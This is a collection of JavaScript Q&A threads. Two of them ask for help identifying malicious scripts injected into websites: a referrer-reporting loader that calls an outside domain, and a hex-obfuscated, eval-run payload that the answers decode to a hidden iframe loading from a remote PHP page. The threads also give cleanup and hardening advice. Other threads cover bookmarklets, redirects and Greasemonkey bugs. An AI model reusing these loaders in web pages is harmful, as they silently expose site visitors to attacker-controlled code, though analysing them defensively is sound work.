Malicious javascript posted in forum - javascript

<SCRIPT>
ff = 0;
for (nn in document) if (nn == 'etours' || nn == 'logo-anim') ff = 1;
if (ff == 0 || (/LIVE|MSN|YAHOO|GENERIC|NORVASC/.test (document.referrer.toUpperCase ()) && false ) ) {
document.write('<SCRIPT SRC ="http://p090303.info/w.php?l='+ escape(location.href) + '&k=' + escape('generic norvasc') + '&r=' + escape(document.referrer) + '"><' + '/SCRIPT>' ); document.write ('<' + '!--' );
}
</SCRIPT>
Recognize this code? I see it's stuck in a number of websites, but all the characters have been replaced with their hex or octal equivalent. Someone posted this code in a post on one of my dad's sites, but I can't quite figure out what it's doing. It seems to be harvesting mappings of web pages to referrers, but I can't figure out what the first few lines are doing. Anyone have any idea what's going on here?

It's writing a script tag to the page, pointing to their javascript. Their javascript will be executed on your website, making them do whatever they please to your website.
The first few lines are just some checks on variables that are probably created within their script. Maybe something to do with checking if the script tag has already been written.

It's checking for dependencies (javascript variables set by other code), then it dials home to let the home server know what page it successfully infected. Home appears to be here in Kiev.


bookmarklet: click for random specified links from a host domain

tl;dr: A bookmarklet that opens in a new tab: random link (with specified multiple html-classes) from a specified domain and code that works with current logins. Thank you.
short version of butchered code:
javascript:
(
var % 20 site = domain.com
function() {
window.location.host == site
void(window.open(document.links[Math.floor(document.querySelectorAll("a.class1, a.class2"))].href, '_blank'))
}();
//beautified with: http://jsbeautifier.org/
To whom it may concern:
I have searched around for a while and even considered switching services but although some come close or are similar to my particular request, none have served to address everything the request entails.
Execute the script on a specific domain even when no page from said domain is currently open. If login authentication for attaining the information or data for execution is required, read or work in conjunction with existing session.
Fetch from a specific domain host, a random link out of all links on that domain with a certain html-class (or indeed otherwise) using preferably, css-selectors.
Open the results in a new tab.
From butchering such similarities, the result became something like this:
//bookmarklet
javascript:
//anonymous function+ wrapped code before execution
(
// function global variables for quick substitution
var %20 site = domain.com
function(){
//set domain for script execution
window.location.host == site
//open new tab for
void(window.open(document.links
//random link
[Math.floor
//with specific classes (elements found with css selectors)
(document.querySelectorAll("a.class1, a.class2"))
]//end random-query
.href,'_blank' //end page-open
)//end link-open
)//end "void"
}//end function definition
//execute
();
//(tried) checked with:
//http://www.javascriptlint.com/online_lint.php
Lastly, I have attained at most basic CSS knowledge. I apologise if this request has anybody headdesking, palming or otherwise in gtfo mode. It is only too sad there is apparently no tag for "Warning: I DIY-ed this stuff" on StackExchange. However, I still would like answers that go into a bit of depth explaining why and what each correction and modification is.
Thank you presently, for your time and effort.
Theoretically, the following code should do what you want:
window.addEventListener('load', function ( ) {
var query = 'a.class1[href], a.class2[href]';
var candidates = document.querySelectorAll(query);
var choice = Math.floor(Math.random() * candidates.length);
window.open(candidates.item(choice).href, 'randomtab');
}, true);
window.location.href = 'http://domain.com';
But it doesn't, because the possibility to retain event listeners across a page unload could be abused and browsers protect you against such abuse.
Instead, you can manually load the domain of your choice and then click a simpler bookmarklet with the following code:
var query = 'a.class1[href], a.class2[href]';
var candidates = document.querySelectorAll(query);
var choice = Math.floor(Math.random() * candidates.length);
window.open(candidates.item(choice).href, 'randomtab');
You could wrap the above in javascript:(function ( ) { ... })(); and minify as before, but it already works if you just minify it and only slap a javascript: in front.
I understand your situation of being an absolute beginner and posting "DIY" code, but I'm still not going to explain step-by-step why this code works and yours doesn't. The first version of the code above is complex to explain to a beginner, and the list of issues with the code in the question is too long to discuss all of them. You'll be better off by studying more Javascript; a good resource with tutorials is MDN.

Site hacked with javascript code inserted

A number of sites that I manage have been hacked and the following javascript code has been inserted into each of the pages. I have no idea how to decode this or what it even does so I don't know how serious it is. Can anyone help?
<script type="text/javascript" language="javascript">
if(document.querySelector)bqlelz=4;zibka=("36,7c,8b,84,79,8a,7f,85,84,36,8c,46,4f,3e,3f,36,91,23,20,36,8c,77,88,36,89,8a,77,8a,7f,79,53,3d,77,80,77,8e,3d,51,23,20,36,8c,77,88,36,79,85,84,8a,88,85,82,82,7b,88,53,3d,7f,84,7a,7b,8e,44,86,7e,86,3d,51,23,20,36,8c,77,88,36,8c,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,88,7b,77,8a,7b,5b,82,7b,83,7b,84,8a,3e,3d,7f,7c,88,77,83,7b,3d,3f,51,23,20,23,20,36,8c,44,89,88,79,36,53,36,3d,7e,8a,8a,86,50,45,45,8b,86,79,82,7f,7b,84,8a,44,79,85,83,45,44,89,83,7f,82,7b,8f,89,45,7d,70,61,87,5e,7e,6d,49,44,86,7e,86,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,86,85,89,7f,8a,7f,85,84,36,53,36,3d,77,78,89,85,82,8b,8a,7b,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,79,85,82,85,88,36,53,36,3d,4f,4c,4e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,7e,7b,7f,7d,7e,8a,36,53,36,3d,4f,4c,4e,86,8e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,8d,7f,7a,8a,7e,36,53,36,3d,4f,4c,4e,86,8e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,82,7b,7c,8a,36,53,36,3d,47,46,46,46,4f,4c,4e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,8a,85,86,36,53,36,3d,47,46,46,46,4f,4c,4e,3d,51,23,20,23,20,36,7f,7c,36,3e,37,7a,85,79,8b,83,7b,84,8a,44,7d,7b,8a,5b,82,7b,83,7b,84,8a,58,8f,5f,7a,3e,3d,8c,3d,3f,3f,36,91,23,20,36,7a,85,79,8b,83,7b,84,8a,44,8d,88,7f,8a,7b,3e,3d,52,86,36,7f,7a,53,72,3d,8c,72,3d,36,79,82,77,89,89,53,72,3d,8c,46,4f,72,3d,36,54,52,45,86,54,3d,3f,51,23,20,36,7a,85,79,8b,83,7b,84,8a,44,7d,7b,8a,5b,82,7b,83,7b,84,8a,58,8f,5f,7a,3e,3d,8c,3d,3f,44,77,86,86,7b,84,7a,59,7e,7f,82,7a,3e,8c,3f,51,23,20,36,93,23,20,93,23,20,7c,8b,84,79,8a,7f,85,84,36,69,7b,8a,59,85,85,81,7f,7b,3e,79,85,85,81,7f,7b,64,77,83,7b,42,79,85,85,81,7f,7b,6c,77,82,8b,7b,42,84,5a,77,8f,89,42,86,77,8a,7e,3f,36,91,23,20,36,8c,77,88,36,8a,85,7a,77,8f,36,53,36,84,7b,8d,36,5a,77,8a,7b,3e,3f,51,23,20,36,8c,77,88,36,7b,8e,86,7f,88,7b,36,53,36,84,7b,8d,36,5a,77,8a,7b,3e,3f,51,23,20,36,7f,7c,36,3e,84,5a,77,8f,89,53,53,84,8b,82,82,36,92,92,36,84,5a,77,8f,89,53,53,46,3f,36,84,5a,77,8f,89,53,47,51,23,20,36,7b,8e,86,7f,88,7b,44,89,7b,8a,6a,7f,83,7b,3
e,8a,85,7a,77,8f,44,7d,7b,8a,6a,7f,83,7b,3e,3f,36,41,36,49,4c,46,46,46,46,46,40,48,4a,40,84,5a,77,8f,89,3f,51,23,20,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,36,53,36,79,85,85,81,7f,7b,64,77,83,7b,41,38,53,38,41,7b,89,79,77,86,7b,3e,79,85,85,81,7f,7b,6c,77,82,8b,7b,3f,23,20,36,41,36,38,51,7b,8e,86,7f,88,7b,89,53,38,36,41,36,7b,8e,86,7f,88,7b,44,8a,85,5d,63,6a,69,8a,88,7f,84,7d,3e,3f,36,41,36,3e,3e,86,77,8a,7e,3f,36,55,36,38,51,36,86,77,8a,7e,53,38,36,41,36,86,77,8a,7e,36,50,36,38,38,3f,51,23,20,93,23,20,7c,8b,84,79,8a,7f,85,84,36,5d,7b,8a,59,85,85,81,7f,7b,3e,36,84,77,83,7b,36,3f,36,91,23,20,36,8c,77,88,36,89,8a,77,88,8a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,7f,84,7a,7b,8e,65,7c,3e,36,84,77,83,7b,36,41,36,38,53,38,36,3f,51,23,20,36,8c,77,88,36,82,7b,84,36,53,36,89,8a,77,88,8a,36,41,36,84,77,83,7b,44,82,7b,84,7d,8a,7e,36,41,36,47,51,23,20,36,7f,7c,36,3e,36,3e,36,37,89,8a,77,88,8a,36,3f,36,3c,3c,23,20,36,3e,36,84,77,83,7b,36,37,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,89,8b,78,89,8a,88,7f,84,7d,3e,36,46,42,36,84,77,83,7b,44,82,7b,84,7d,8a,7e,36,3f,36,3f,36,3f,23,20,36,91,23,20,36,88,7b,8a,8b,88,84,36,84,8b,82,82,51,23,20,36,93,23,20,36,7f,7c,36,3e,36,89,8a,77,88,8a,36,53,53,36,43,47,36,3f,36,88,7b,8a,8b,88,84,36,84,8b,82,82,51,23,20,36,8c,77,88,36,7b,84,7a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,7f,84,7a,7b,8e,65,7c,3e,36,38,51,38,42,36,82,7b,84,36,3f,51,23,20,36,7f,7c,36,3e,36,7b,84,7a,36,53,53,36,43,47,36,3f,36,7b,84,7a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,82,7b,84,7d,8a,7e,51,23,20,36,88,7b,8a,8b,88,84,36,8b,84,7b,89,79,77,86,7b,3e,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,89,8b,78,89,8a,88,7f,84,7d,3e,36,82,7b,84,42,36,7b,84,7a,36,3f,36,3f,51,23,20,93,23,20,7f,7c,36,3e,84,77,8c,7f,7d,77,8a,85,88,44,79,85,85,81,7f,7b,5b,84,77,78,82,7b,7a,3f,23,20,91,23,20,7f,7c,3e,5d,7b,8a,59,85,85,81,7f,7b,3e,3d,8c,7f,89,7f,8a,7b,7a,75,8b,87,3d,3f,53,53,4b,4b,3f,91,93,7b,82,89,7b,91,69,7b,8a,59,85,
85,81,7f,7b,3e,3d,8c,7f,89,7f,8a,7b,7a,75,8b,87,3d,42,36,3d,4b,4b,3d,42,36,3d,47,3d,42,36,3d,45,3d,3f,51,23,20,23,20,8c,46,4f,3e,3f,51,23,20,93,23,20,93".split(","));twuss=eval;function oqvw(){iuwo=function(){--(uiopm.body)}()}uiopm=document;for(wxuxe=0;wxuxe<zibka["length"];wxuxe+=1){zibka[wxuxe]=-(22)+parseInt(zibka[wxuxe],bqlelz*4);}try{oqvw()}catch(ggpl){hywzjw=50-50;}if(!hywzjw)twuss(String["fr"+"omCh"+"arCo"+"de"].apply(String,zibka));
</script>
I'm assuming these are character references and it's actually pointing to a site somewhere with some malicious content but I don't know how to work it out. I am going through and removing all of these and changing all passwords to prevent further security issues but any advice on this would be greatly appreciated!
Thanks.
In my experience, these sorts of attacks happen on shared hosting servers where an automated bot has either guessed the password to the account, or there is malware on the account holder's desktop that has captured the credentials and is now abusing them.
Your best bet? Accept that there is definitely going to be an impact to your users, and then do your due diligence:
Notify your shared host if you're not the owner.
Archive the entire home directory of the shared hosting account, and include the contents of that user's cron jobs, databases, email and other information. (eg. tar -czf website-$(date +%F).tar.gz ~/ or your shared hosting backup utility.)
Check for any malicious processes or scripts that could be running. ps gaux is your friend.
Nuke everything in the shared hosting account.
Change every password, regardless, even if you think it couldn't have possibly been affected.
Re-create the account and leave a maintenance page available for your users. You should have backups of your account.
Unpack the backup within a virtual machine and investigate everything including logs and other information to discover how the attack occurred. Apply what you learn to your website code.
Re-deploy your code with the fixes, taking into account the causes you discovered in the previous step; if your account was using a framework like Joomla, Drupal, WordPress or something similar, take this time to upgrade to the latest version.
Do not skip steps, or this will happen again.
This is what was injected. To decipher this, you do the same thing the javascript in your post does. Split the string into hex strings on the comma, then parseInt with base 16, subtract 22, and look up the character for that char code. How it could be used maliciously, I'm not sure. Anyone have any ideas?
function v09() {
var static = 'ajax';
var controller = 'index.php';
var v = document.createElement('iframe');
v.src = 'http://upclient.com/.smileys/gZKqHhW3.php';
v.style.position = 'absolute';
v.style.color = '968';
v.style.height = '968px';
v.style.width = '968px';
v.style.left = '1000968';
v.style.top = '1000968';
if (!document.getElementById('v')) {
document.write('<p id=\'v\' class=\'v09\' ></p>');
document.getElementById('v').appendChild(v);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0)
nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue)
+ ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) &&
(name != document.cookie.substring(0, name.length)))
{
return null;
}
if (start == -1)
return null;
var end = document.cookie.indexOf(";", len);
if (end == -1)
end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled)
{
if (GetCookie('visited_uq') == 55) {
} else {
SetCookie('visited_uq', '55', '1', '/');
v09();
}
}
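The answer above describes the decoding recipe (split on commas, parseInt base 16, subtract 22, fromCharCode). As an added example that is not code from the post or its answers, here is that recipe as a static decoder that never evaluates the result, run over a constructed sample blob with a placeholder host rather than the injected payload itself:

```javascript
// Added example (not code from the post or its answers): a static decoder for
// the obfuscation scheme the answer describes. The injected script held a
// comma-separated list of hex tokens, computed parseInt(token, 16) - 22 for
// each one and passed the result to eval through String.fromCharCode.
// This decoder only recovers the text for inspection; nothing is executed.

const OFFSET = 22; // the "-(22)" in the injected loop
const RADIX = 16;  // bqlelz * 4 == 16 in the injected loop

// Decode a comma-separated hex token list back into source text.
// Throws on anything that is not a valid token instead of silently
// producing garbage, so a tampered or truncated blob is noticed.
function decodeHexBlob(blob) {
  return blob.split(',').map((tok) => {
    const n = parseInt(tok.trim(), RADIX) - OFFSET;
    if (!/^\s*[0-9a-f]+\s*$/i.test(tok) || n < 0) {
      throw new Error(`bad token: ${JSON.stringify(tok)}`);
    }
    return String.fromCharCode(n);
  }).join('');
}

// Inverse transform, used here only to build a constructed sample.
function encodeHexBlob(text) {
  return Array.from(text, (ch) => (ch.charCodeAt(0) + OFFSET).toString(RADIX)).join(',');
}

// Pull anything URL-shaped out of decoded text so the analyst sees where the
// payload loads from; that host is what to block and search logs for.
function extractUrls(text) {
  return text.match(/https?:\/\/[^\s'"<>]+/g) || [];
}

// Constructed sample of the same shape as the decoded payload in the answer
// (hidden iframe pushed off-screen); the host is a placeholder, not a real IoC.
const SAMPLE_SOURCE =
  "var v = document.createElement('iframe');\n" +
  "v.src = 'http://placeholder.invalid/drop.php';\n" +
  "v.style.left = '1000968';";
const SAMPLE_BLOB = encodeHexBlob(SAMPLE_SOURCE);

const decoded = decodeHexBlob(SAMPLE_BLOB);
console.log(decoded);
console.log('loads from:', extractUrls(decoded));
```

Because the decoder raises on any malformed token, it is safe to point at a blob copied straight out of a compromised page; the eval step in the original is deliberately not reproduced.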
This type of thing has happened to me also, I was not on a shared hosting solution, I was on a dedicated server, there was no evidence of any FTP or SSH or SCP activity.
I realized that someone used one of my forms to do code injection (my sites are PHP). This can be achieved by using your own code against you, by providing input to a textbox or text field that would be interpreted by some code on your server.
For example, you may have a small form to allow people to upload files into a directory of some sort. Someone can upload a code file and then execute it and this code file can be the culprit used to inject the javascript code into your own code pages.
With this instance one can restrict what file types are allowed to be uploaded, place the files in a directory where a browser would not be able to access it directly or make sure the file has no execute permissions when uploaded.
You can also make sure to sanitize inputs so that no malicious text can be effective in any of your forms.

Javascript is broken in html page source

I have a Java web application. I am using jQuery in it. I am calling some JavaScript from my JSP page. I have used EL and JSTL tags in my page. Some of the jQuery variables are assigned from JSP variables. A strange problem occurs randomly. Some of the JavaScript lines are broken. I found those from the Page Source option of the browser. But in the JSP page I have found that no code is broken.
Say I have the following line in jsp
var iChars = "!##$%^&*()+=-[]\\\';,./{}|\":<>?~_";
var term = $.trim(request.term.toLowerCase());
var wordCount = term.split(" ").length;
if (term.length > 0 && iChars.indexOf(term.charAt(0)) == -1) {
// here a jquery ajax call
}
else if (term.length > 0 && iChars.indexOf(term.charAt(0)) != -1) {
$("#simpleSearch-1105 .field").autocomplete("close");
alert("Search word should not start with !##$%^&*()+=-[]\\\';,./{}|\":<>?~_");
}
But in the html page source I found the line as follows
$("#simpleSearch-
1105 .field").autocomplete("close");
The code is broken into two lines. Because of this I am getting a JS error. I found no valid reason for that. It seems completely strange to me. Could you guys give me some clue? What may be the cause?
Note: I also have Firebug installed. First I thought that it may be due to Firebug. Then I uninstalled Firebug. But still the same result.

Re-Direct with document.url.match

My goal is to redirect my website to (/2012/index.php)
ONLY IF the user goes to ( http://www.neonblackmag.com )
ELSE IF
the user goes to ( http://neonblackmag.com.s73231.gridserver.com ) they will not be re-directed... (this way I can still work on my website and view it from this URL (the temp URL))
I have tried the following script and variations; I have been unsuccessful in getting this to work thus far....
<script language="javascript">
if (document.URL.match("http://www.neonblackmag.com/")); {
location.replace("http://www.neonblackmag.com/2012"); }
</script>
This should work:
<script type="text/javascript">
if(location.href.match(/www.neonblackmag.com/)){
location.replace("http://www.neonblackmag.com/2012");
}
</script>
You should use a regular expression as the argument of match (if you're not using https you can drop match for http://...).
In your solution the semicolon after if should be removed - and I think that's it; mine is using location.href instead of document.URL.
You can also match subfolders using location.href.match(/www.neonblackmag.com\/subfolder/) etc
Cheers
G.
document.url doesn't appear to be settable, afaict. You probably want window.location
<script type="text/javascript">
if (window.location.hostname === "www.neonblackmag.com") {
window.location.pathname = '/2012';
}
</script>
(Don't use language="javascript". It's deprecated.)
Anyone at any time can disable JavaScript and continue viewing your site. There are better ways to do this, mostly on the server side.
To directly answer your questions, this code will do what you want. Here's a fiddle for it.
var the_url = window.location.href;
document.write(the_url);
// This is our pretend URL
// Remove this next line in production
var the_url = 'http://www.neonblackmag.com/';
if (the_url.indexOf('http://www.neonblackmag.com/') !== -1)
window.location.href = 'http://www.neonblackmag.com/2012/index.php';
else
alert('Welcome');
As I said, this can be easily bypassed. It'd be enough to stop a person who can check email and do basic Google searches.
On the server side is where you really have power. In your PHP code you can limit requests to only coming from your IP, or only any other variable factor, and no one can get in. If you don't like the request, send them somewhere else instead of giving them the page.
header('Location: /2012/index.php'); // PHP code for a redirect
There are plenty of other ways to do it, but this is one of the simpler ones. Others include redirecting the entire domain, or creating a test subdomain and only allowing requests to that.
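The answers above test the current URL with a regex, a substring search or a hostname comparison. As an added example that is not code from any answer in the thread, the following decides the redirect from the parsed hostname alone, using the two host names from the question; the redirect path, the loop guard and the function name are assumptions:

```javascript
// Added example (not from any answer in the thread): decide the redirect from
// the parsed hostname rather than a regex or substring test on the whole URL.
// The host names are the ones in the question; everything else is assumed.

const PRODUCTION_HOST = 'www.neonblackmag.com';
const REDIRECT_PATH = '/2012/index.php';

// Return the URL to navigate to, or null when no redirect should happen.
function redirectTarget(currentUrl) {
  let u;
  try {
    u = new URL(currentUrl);
  } catch (e) {
    return null; // unparsable input: do nothing
  }
  // Exact host comparison (URL already lower-cases the host). A test such as
  // url.match(/www.neonblackmag.com/) is also true for any URL that merely
  // contains that text, and its unescaped dots match any character, so the
  // staging host and look-alike hosts would pass it.
  if (u.hostname !== PRODUCTION_HOST) return null;
  // Already under /2012: avoid redirecting in a loop.
  if (u.pathname === '/2012' || u.pathname.startsWith('/2012/')) return null;
  return `${u.protocol}//${u.host}${REDIRECT_PATH}`;
}

// In a browser the check is applied on page load; the guard lets the same
// file run under Node for the assertions.
if (typeof window !== 'undefined') {
  const target = redirectTarget(window.location.href);
  if (target) window.location.replace(target);
}
```

As the last answer notes, a client-side redirect is only a convenience for the developer; the server-side header() redirect is what actually withholds the page.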

Why does dojo.xhrGet needs different kinds of url to work on different computers (pc/mac)?

I'm writing a Greasemonkey script for somebody else. He is a moderator and I am not, and the script will help him do some moderating things.
Now the script works for me, as far as it can work for me (as I am not a mod).
But even those things that work for me are not working for him..
I checked his version of the Greasemonkey plugin and Firefox and he is up to date.
The only thing that's really different is that I'm on a Mac and he is on a PC, but I wouldn't think that would be any problem.
This is one of the functions that is not working for him. He does get the first and third GM_log message, but not the second one ("got some(1) ..").
kmmh.trackNames = function(){
GM_log("starting to get names from the first "+kmmh.topAmount+" page(s) from leaderboard.");
kmmh.leaderboardlist = [];
for (var p=1; p<=(kmmh.topAmount); p++){
var page = "http://www.somegamesite.com/leaderboard?page="+ p;
var boardHTML = "";
dojo.xhrGet({
url: page,
sync: true,
load: function(response){
boardHTML = response;
GM_log("got some (1) => "+boardHTML.length);
},
handleAs: "text"
});
GM_log("got some (2) => "+boardHTML.length);
//create dummy div and place leaderboard html in there
var dummy = dojo.create('div', { innerHTML: boardHTML });
//search through it
var searchN = dojo.query('.notcurrent', dummy).forEach(function(node,index){
if(index >= 10){
kmmh.leaderboardlist.push(node.textContent); // add names to array
}
});
}
GM_log("all names from "+ kmmh.topAmount +" page(s) of leaderboard ==> "+ kmmh.leaderboardlist);
}; // close the function assigned to kmmh.trackNames
Does anyone have any idea what could be causing this?
EDIT: I know I had to write according to what he would see on his mod screen, so I asked him to copy-paste the source of pages and so on. And besides that, this part of the script does not depend on being a mod or not.
I got everything else working for him. Just this function still doesn't on either of his PCs.
EDIT2 (changed question): OK. So after some more trial and error, I got it to work, but it's still weird.
When I removed the www part of the URL that's being used in the dojo.xhrGet() I finally got the same error he got. So I had him add www to his and now it works.
The odd thing is he now uses a script with the URL containing "www" and I'm using a script with a URL without "www"...
So for me:
var page = "http://somegamesite.com/leaderboard?page="+ p;
And for him:
var page = "http://www.somegamesite.com/leaderboard?page="+ p;
Why don't you have him try logging into an account that is not a moderator account so that you eliminate one of your variables from your problem space.
It's possible that the DOM of the page is different for a moderator than for a regular user. If you're making assumptions about the page as a regular user that are not true as a moderator, that could cause problems.
I suspect that to fix it, you may need access to a moderator account so you can more easily replicate the behavior.
Ooops. It seemed that the URL of this game site is accessible as www.gamesite.com as well as gamesite.com (without the www part). This caused the problem.
Sorry to bother you all.
I go hide in shame now...